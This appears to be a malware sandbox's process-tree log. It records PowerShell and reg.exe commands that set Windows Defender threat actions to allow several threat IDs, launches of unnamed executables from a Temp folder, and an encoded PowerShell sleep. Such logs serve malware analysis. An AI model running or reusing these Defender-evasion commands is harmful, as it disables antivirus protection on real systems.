C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"2⤵PID:8252
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵PID:4284
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:8796
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:7520
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:6024
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:8212
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:6320
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:8244
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:5036
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:1528
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:7688
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:8484
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:2144
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:6336
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:5076
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:7280
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:7744
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:8944
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:5112
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:8244
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:7636
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:9008
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:2144
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:3592
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:6424
-
-
-
C:\Users\Admin\AppData\Local\Temp\2BFB.exeC:\Users\Admin\AppData\Local\Temp\2BFB.exe1⤵PID:8084
-
C:\Users\Admin\AppData\Local\Temp\8651.exeC:\Users\Admin\AppData\Local\Temp\8651.exe1⤵PID:4184
-
C:\Users\Admin\AppData\Local\Temp\92B6.exeC:\Users\Admin\AppData\Local\Temp\92B6.exe1⤵PID:7240
-
C:\Users\Admin\AppData\Local\Temp\994E.exeC:\Users\Admin\AppData\Local\Temp\994E.exe1⤵PID:1012
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMgAwAA==2⤵PID:6208
-